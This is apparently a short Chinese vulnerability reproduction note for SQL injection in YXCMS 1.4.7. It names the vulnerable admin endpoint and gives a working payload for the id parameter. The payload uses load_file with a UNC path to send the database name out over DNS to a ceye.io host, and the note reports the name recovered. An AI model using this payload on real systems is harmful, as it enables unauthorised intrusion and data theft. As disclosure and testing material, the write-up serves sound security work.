YXCMS 1.4.7SQL注入 1. 影响版本¶ 1.4.7 2.漏洞复现¶ url:/index.php?r=admin/fragment/index 利用ceye得到的回显 用bp抓包,修改id为 payload: 2 and if((select load_file(concat('\\',(select database()),'.36rdia.ceye.io\abc'))),2,2) 在ceye上面可以得到回显: 得到了数据库名称yxcms
利用ceye得到的回显 用bp抓包,修改id为
得到了数据库名称yxcms 